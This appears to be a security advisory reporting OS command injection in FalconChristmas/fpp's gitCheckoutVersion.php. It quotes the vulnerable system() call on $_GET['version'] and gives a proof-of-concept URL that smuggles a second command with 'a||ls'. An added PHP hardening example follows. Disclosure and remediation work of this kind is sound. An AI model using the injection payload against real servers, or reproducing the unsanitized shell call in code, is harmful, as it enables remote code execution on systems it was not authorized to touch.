OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

Hi, in https://github.com/FalconChristmas/fpp/blob/721c99aed6897792bf7f79fa02a280995e27d409/www/gitCheckoutVersion.php#L38 :

<?
system($SUDO . " $fppDir/scripts/git_checkout_version " . $_GET['version']);
?>

The system() function is called with user input: $_GET['version'] is concatenated directly into the command string, so a malicious user can take advantage of it if the version variable contains a command.

🕵️‍♂️ Proof of Concept

http://127.0.0.1/gitCheckoutVersion.php?version=a||ls

💥 Impact

Remote Code Execution
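
One way to harden the call shown in the description, as an added example that is not the project's own code or its actual fix: validate the version against an allowlist and quote it before it reaches the shell. The function name `buildCheckoutCommand`, the allowed pattern, and the sample values `sudo` and `/opt/fpp` are assumptions made for illustration.

```php
<?php
// Added example. Only $SUDO, $fppDir, git_checkout_version and the
// "a||ls" input come from the report; every other name is hypothetical.

/**
 * Return the command line to run, or null when the version is rejected.
 */
function buildCheckoutCommand(string $sudo, string $fppDir, $version): ?string
{
    // ?version[]=x arrives as an array; accept plain strings only.
    if (!is_string($version)) {
        return null;
    }

    // Allowlist (assumed shape of a branch or tag name): first character
    // alphanumeric, then letters, digits, '.', '_' or '-', 64 chars max.
    // The first-character rule also stops a value such as "-x" from being
    // read as an option by the script. \A and \z anchor the whole string,
    // so a trailing newline is rejected (a plain $ would allow it).
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $version)) {
        return null;
    }

    // Defence in depth: quote every argument even after validation.
    return $sudo
        . ' ' . escapeshellarg($fppDir . '/scripts/git_checkout_version')
        . ' ' . escapeshellarg($version);
}

// Constructed sample inputs; the command is printed, never executed.
$samples = ['v4.6', 'master', 'a||ls', '-x', "v4.6\n", ['v4.6']];

foreach ($samples as $sample) {
    $cmd = buildCheckoutCommand('sudo', '/opt/fpp', $sample);
    printf("%-12s => %s\n", json_encode($sample), $cmd ?? 'REJECTED');
}

// In the request handler the result would gate the call, for example:
//   $cmd = buildCheckoutCommand($SUDO, $fppDir, $_GET['version'] ?? null);
//   if ($cmd === null) { http_response_code(400); exit; }
//   system($cmd);
```

Only the first two samples produce a command; the proof-of-concept value `a||ls` is rejected by the allowlist before any shell is involved.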